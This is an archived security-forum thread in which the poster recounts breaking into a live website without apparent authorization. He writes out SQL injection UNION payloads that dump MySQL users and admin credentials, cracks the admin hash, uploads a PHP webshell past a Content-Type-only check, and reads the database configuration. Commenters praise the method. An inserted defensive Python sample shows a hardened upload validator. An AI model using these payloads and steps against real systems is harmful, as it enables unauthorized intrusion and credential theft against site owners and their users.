Silic Group Forum Archive - Silic Security

[Original] A fiddly injection and an upload bypass

kevinsss
Posted 2016-6-1 16:24:06
This post was last edited by kevinsss on 2016-6-17 16:16

Straight to the point. I found a site whose API URLs were RESTful style. I casually appended a ' and got an error, so there's an injection point:
Nice, it even reports the complete statement. Since I know the statement, let's build the injection.
The original query uses an ORDER BY, so there's no need to guess the column count with UNION; just try ORDER BY xx one value at a time.
ORDER BY 19 errors out, so the table has 18 columns:
Next, see which column gets displayed:
    +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
Sadly it seems only column 2 is displayed, but that's enough.
Let's look at the system user info. It's MySQL, so no guessing needed; directly:
    +union+select+1,concat(user,0x5f,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+mysql.user--
The result was indeed missing information; part of it wasn't displayed. I tried the other pages and didn't seem to find any injection point, so I kept working on this one.
Since only part of it is shown, use a trick: if it can't be shown all at once, show it in several pieces with substring() and then concatenate them:
    substring(concat(admin_user,0x5f,admin_pass),10,30)
Finally I assembled root's password hash and tried cracking it. As expected, cracking failed!
Had to find another way. Since it's the root user, let's see whether load_file() can read the '/etc/passwd' file. Doesn't seem to work; hex, unhex and the like all fail too,
the result comes back blank. Probably insufficient OS permissions.
Try again:
    select '一句话' into outfile '/var/www/html'
That doesn't work either; it seems to be PHP's quote filtering, and '/var/www/html' can't be hex-encoded here. Gave that up and kept looking for a way in.
Next, dump the table names:
    Current database:
    union+select+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
    All tables under it:
    union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+t+where+t.table_schema=0x6f786d736264626568325f6d65646961--#
Found the cms_admin table, which should be the backend account table. List its column names:
    union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.columns+t+where+t.table_name=0x636d735f61646d696e--#
Finally, view the backend users and passwords:
    union+select+1,concat(admin_user,0x5f,admin_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+cms_admin--
Again it's truncated; slice it with substring again and piece the full value together.
Ended up with admin's password, and it turned out to be SHA1 rather than the usual md5. Threw it into the cracker anyway, and luckily it cracked!
Scanned for the backend; simple, just add /admin and there it is. Logged in with the account just obtained and found it uses the KindEditor editor. Tried uploading with
test.php.jpg, test.php;.jpg, test.php".jpg renames, intercepting the request and so on. The upload file format is restricted, and the file is renamed with a timestamp too. Speechless; keep looking!
Found another image upload point and tried it. Format restricted, also renamed with a timestamp. Tried bypassing with Burp interception, still said the format doesn't match, and files in the right format
got renamed to something like 201623423423.jpg. Finally noticed the client doesn't check the format at all, meaning the format check is done server-side. Annoying, pretty rigorous!
In the end there was still one slip, and I found the hole.
Upload test.php with Burp interception on, change Content-Type: to image/jpeg, and it actually went through. Looks like the server only validated the content-type and didn't filter the extension.
Finally, connect with 菜刀 (China Chopper):

Go into the project directory, grab the database config, and connect to the database:
OK, that's it. Took a look; it's an internal network. Couldn't be bothered to go further, didn't want to escalate privileges or do damage.
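As an added illustration (not the site's code and not kevinsss's), here is the Content-Type-only check the post describes placed next to a hardened server-side validator that ignores the client's header, allowlists the final extension, checks the file's magic bytes and stores under a random name; the function names, magic constants and sample requests are constructed for this example.

```python
import os
import secrets

# Magic bytes for the only image types we accept, keyed by final extension.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
IMAGE_MIME = {"image/jpeg", "image/png", "image/gif"}


def weak_check(filename, content_type, data):
    """The flawed check from the post: trusts the client-supplied Content-Type
    and never looks at the extension or the bytes. Returns stored name or None."""
    return filename if content_type in IMAGE_MIME else None


def hardened_check(filename, content_type, data):
    """Server-side check that trusts nothing from the client: the final extension
    must be allowlisted, the body must start with that type's magic bytes, and the
    stored name is random, so 'test.php;.jpg'-style names never reach the disk.
    Content-Type is deliberately ignored. Returns stored name or None."""
    base = os.path.basename(filename)
    if base != filename or base.startswith("."):
        return None  # path components or dotfiles are not acceptable names
    ext = os.path.splitext(base)[1].lower()
    if ext not in IMAGE_MAGIC:
        return None
    if not data.startswith(IMAGE_MAGIC[ext]):
        return None  # e.g. PHP source uploaded as 'x.jpg' or 'x.php;.jpg'
    # Timestamps (the 201623423423.jpg scheme in the post) are guessable;
    # use a random token and never reuse any part of the user's name.
    return secrets.token_hex(16) + ext


# Constructed sample requests: (filename, Content-Type, leading bytes of body).
SAMPLES = [
    ("test.php", "image/jpeg", b"<?php /* not an image */ ?>"),
    ("test.php;.jpg", "image/jpeg", b"<?php /* not an image */ ?>"),
    ("photo.jpg", "image/jpeg", b"\xff\xd8\xff\xe0\x00\x10JFIF"),
    ("photo.png", "application/octet-stream", b"\x89PNG\r\n\x1a\n\x00\x00"),
]


def compare(samples=SAMPLES):
    """Return {filename: (weak_accepted, hardened_accepted)} for each sample."""
    return {name: (weak_check(name, ctype, body) is not None,
                   hardened_check(name, ctype, body) is not None)
            for name, ctype, body in samples}
```

Even with this check, the upload directory must be served with script execution disabled, since a valid image can still carry script text after its header.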


Posted 2016-6-1 16:49:40
Got it without any effort.
KeyMyran
Posted 2016-6-1 17:13:36
Just here to see that one slip.
KeyMyran
Posted 2016-6-1 17:16:17
That one slip..... usually the ones I run into have content-type properly locked down.
治愈~~
Posted 2016-6-1 17:31:50
Learning...
莫须有
Posted 2016-6-1 18:39:23
Replying is a virtue.
Ro535
Posted 2016-6-1 18:48:00
Learning!
pkko881
Posted 2016-6-1 18:56:01
Usually the ones I run into have content-type properly locked down.
纯洁小白
Posted 2016-6-1 19:34:12
Ran into a really hard site, also injection...
流弊的小牛
Posted 2016-6-1 19:35:25
Learning the big guys' fancy moves.
南宫剑影
Posted 2016-6-1 21:08:49
I'm just here to learn, ahh.
W2015
Posted 2016-6-1 21:23:01
66666, learned something.
harkie
Posted 2016-6-1 21:42:22
Just here for the bypass.
a997825438
Posted 2016-6-2 00:30:28
Here to learn upload techniques!
nolove
Posted 2016-6-2 08:55:09 from mobile phone
Let's see what method.
nolove
Posted 2016-6-2 08:55:26 from mobile phone
Let's see what method.
ztaosony
Posted 2016-6-2 09:05:57
Where's the promised slip?
cwxfd
Posted 2016-6-2 09:33:42
Taking a look, learning.
sleepcat
Posted 2016-6-2 09:59:40
Replying is a virtue.
月下之晨
Posted 2016-6-2 10:20:05
Learning injection from the big guys, learning injection from the big guys, learning injection from the big guys.